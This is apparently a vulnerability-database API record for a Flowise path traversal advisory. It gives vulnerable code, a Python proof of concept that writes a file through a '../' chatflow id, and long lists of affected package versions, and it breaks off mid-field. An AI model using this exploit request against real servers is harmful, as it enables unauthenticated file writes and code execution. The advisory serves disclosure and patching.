Vulnerability Instance
Lookup for vulnerabilities affecting packages.
GET /api/vulnerabilities/360549?format=api
{ "url": "http://public2.vulnerablecode.io/api/vulnerabilities/360549?format=api", "vulnerability_id": "VCID-g7y6-euhd-jqhh", "summary": "Flowise has arbitrary file access due to missing chat flow id validation\n### Summary\n\nMissing chat flow id validation allows an attacker to access arbitrary file.\n\n### Details\n\nCommit https://github.com/FlowiseAI/Flowise/commit/8bd3de41533de78e4ef6c980e5704a1f9cb7ae6f and https://github.com/FlowiseAI/Flowise/commit/c2b830f279e454e8b758da441016b2234f220ac7 added check for `filename` when handling file upload operations to prevent path traversal, and additional validation of `chatflowId` and `chatId` from route `/api/v1/attachments`. In some cases, however, `chatflowId` and `chatId` are not validated to ensure they are UUIDs or numbers, which may lead to security issues.\n\n**Case 1**\n\nWhen creating new chatflow via `/api/v1/chatflows`, function `addBase64FilesToStorage` is called if there exists base64 file data. Although the `filename` is sanitized, the `chatflowid` comes from request body directly without any validation. An attacker could exploit the path traversal here to write arbitrary file with controlled data.\n\n```typescript\nexport const addBase64FilesToStorage = async (fileBase64: string, chatflowid: string, fileNames: string[]) => {\n // ...\n } else {\n const dir = path.join(getStoragePath(), chatflowid) // path traversal here\n if (!fs.existsSync(dir)) {\n fs.mkdirSync(dir, { recursive: true })\n }\n\n const splitDataURI = fileBase64.split(',')\n const filename = splitDataURI.pop()?.split(':')[1] ?? ''\n const bf = Buffer.from(splitDataURI.pop() || '', 'base64')\n const sanitizedFilename = _sanitizeFilename(filename)\n\n const filePath = path.join(dir, sanitizedFilename)\n fs.writeFileSync(filePath, bf)\n fileNames.push(sanitizedFilename)\n return 'FILE-STORAGE::' + JSON.stringify(fileNames)\n }\n}\n```\n\n**Case 2**\n\nWhen downloading file via `/api/v1/openai-assistants-file/download` or `/api/v1/get-upload-file`, function `streamStorageFile` is called to retrieve file data from local or cloud bucket. The `chatflowId` and `chatId` are used for file path generation. Take Amazon S3 as an example, its [[documentation indicates](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines)](https://docs.aws.amazon.com/AmazonS3/latest/userguide/object-keys.html#object-key-guidelines) that `../` will be treated as relative path.\n\nNote that these APIs are in `WHITELIST_URLS`, an attacker may traverse user storage files without authentication.\n\n### PoC\n\nLaunch app at localhost with default config, then run the following python script, a file named 'pwn' will be written to dir `/tmp` with content 'Hello, World!'.\n\n```python\nimport requests\nimport json\nurl = \"http://localhost:8080/api/v1/chatflows\"\nheaders = {\"x-request-from\": \"internal\"}\nnodedata = {\n \"category\" : \"Document Loaders\",\n \"inputs\" : {\n \"key\" : \"data:text/plain;base64,SGVsbG8sIFdvcmxkIQ==,a:pwn\"\n }\n}\nflownode = {\n \"id\" : \"a\",\n \"data\" : nodedata\n}\nflowdata = {\n \"nodes\" : [flownode],\n \"edges\" : [],\n \"viewport\" : {\n \"x\" : 1,\n \"y\" : 1,\n \"zoom\" : 1\n }\n}\ndata = {\n \"id\" : \"../../../../../tmp\",\n \"name\" : \"name\",\n \"flowData\" : json.dumps(flowdata)\n}\nres = requests.post(url, json=data, headers=headers)\n```\n\n### Impact\n\n1. Arbitrary file read / write\n2. Remote Code Execution\n3. Data loss", "aliases": [ { "alias": "GHSA-q67q-549q-p849" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/34612?format=api", "purl": "pkg:npm/flowise@3.0.6", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.6" } ], "affected_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/395072?format=api", "purl": "pkg:npm/flowise@2.2.8", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@2.2.8" }, { "url": "http://public2.vulnerablecode.io/api/packages/823706?format=api", "purl": "pkg:npm/flowise@3.0.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.0" }, { "url": "http://public2.vulnerablecode.io/api/packages/34324?format=api", "purl": "pkg:npm/flowise@3.0.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-u91w-qe9z-rfg4" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.1" }, { "url": "http://public2.vulnerablecode.io/api/packages/823707?format=api", "purl": "pkg:npm/flowise@3.0.2", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.2" }, { "url": "http://public2.vulnerablecode.io/api/packages/823708?format=api", "purl": "pkg:npm/flowise@3.0.3", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/flowise@3.0.3" }, { "url": "http://public2.vulnerablecode.io/api/packages/823709?format=api", "purl": "pkg:npm/flowise@3.0.4", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-14af-nhf3-aqba" }, { "vulnerability": "VCID-17k4-psgt-sydg" }, { "vulnerability": "VCID-19jc-umg6-v7ce" }, { "vulnerability": "VCID-1xfp-4rtg-4bcu" }, { "vulnerability": "VCID-2891-vddv-ebff" }, { "vulnerability": "VCID-39aw-3gc6-bkgb" }, { "vulnerability": "VCID-3chx-dj2u-kbab" }, { "vulnerability": "VCID-3gp6-wwtd-kkf1" }, { "vulnerability": "VCID-488c-vrqu-f7hf" }, { "vulnerability": "VCID-5j9e-bcr5-n7bs" }, { "vulnerability": "VCID-5pup-kgaf-3ubw" }, { "vulnerability": "VCID-67mz-pfy4-ykep" }, { "vulnerability": "VCID-6ufs-d346-d7ev" }, { "vulnerability": "VCID-6wat-8akx-hycz" }, { "vulnerability": "VCID-71uq-yx2j-cqak" }, { "vulnerability": "VCID-9bht-svq8-87b4" }, { "vulnerability": "VCID-9rqv-p7rz-5kar" }, { "vulnerability": "VCID-a1e4-f5dh-w3a5" }, { "vulnerability": "VCID-abyp-yn76-1yfp" }, { "vulnerability": "VCID-affy-v76q-fub6" }, { "vulnerability": "VCID-aqg8-6us7-uqef" }, { "vulnerability": "VCID-b97u-efzx-dffn" }, { "vulnerability": "VCID-bkmk-k9mn-ekhx" }, { "vulnerability": "VCID-cb6d-4c2v-w7c3" }, { "vulnerability": "VCID-cxja-9yxc-k7au" }, { "vulnerability": "VCID-d4wa-szeh-43ab" }, { "vulnerability": "VCID-dtss-epth-z7fh" }, { "vulnerability": "VCID-dzed-27rk-3qav" }, { "vulnerability": "VCID-e65e-s5sd-kuhp" }, { "vulnerability": "VCID-ejdc-j73x-jydk" }, { "vulnerability": "VCID-fje6-knjc-nfgf" }, { "vulnerability": "VCID-fu6t-9dk4-jbh9" }, { "vulnerability": "VCID-g7y6-euhd-jqhh" }, { "vulnerability": "VCID-gt6n-beak-33gy" }, { "vulnerability": "VCID-gvpx-4wkw-43cz" }, { "vulnerability": "VCID-hdej-umwh-kqav" }, { "vulnerability": "VCID-hkfs-v3bp-kbh5" }, { "vulnerability": "VCID-j5hh-haj2-qydg" }, { "vulnerability": "VCID-jcze-eg2c-mkcf" }, { "vulnerability": "VCID-jmps-anck-eqdt" }, { "vulnerability": "VCID-k579-xd81-hqdu" }, { "vulnerability": "VCID-kpyg-gve3-b3av" }, { "vulnerability": "VCID-ksmv-s6c9-t7ap" }, { "vulnerability": "VCID-m3j3-4u39-euht" }, { "vulnerability": "VCID-pzza-9xq9-a7de" }, { "vulnerability": "VCID-qgs1-hazv-67b8" }, { "vulnerability": "VCID-qm89-q2ar-uyhy" }, { "vulnerability": "VCID-r74e-k86f-7qgb" }, { "vulnerability": "VCID-rgmv-6bqh-eqf2" }, { "vulnerability": "VCID-rkaz-75t9-r3gs" }, { "vulnerability": "VCID-s3jg-wce1-fbf3" }, { "vulnerability": "VCID-t5jg-qrw2-aqcv" }, { "vulnerability": "VCID-t839-eydz-1ud4" }, { "vulnerability": "VCID-tdm1-91mc-8kgr" }, { "vulnerability": "VCID-v1nz-wwsu-qycg" }, { "vulnerability": "VCID-v9hg-7pex-g3dp" }, { "vulnerability": "VCID-w9yr-5jbp-q7fm" }, { "vulnerability": "VCID-wg28-w8vn-ybb5" }, { "vulnerability": "VCID-xt1d-efw7-g3c6" }, { "vulnerability": "VCID-ywgu-76cy-uqe7" }, { "vulnerability": "VCID-z1y2-f2ws-8ycb" }, { "vulnerability": "VCID-zbrd-qdty-2bfs" }, { "vulnerability": "VCID-zwna-stj5-3yhm" }, { "vulnerability": "VCID-zwz7-byj4-6qan" } ], "resource_url": 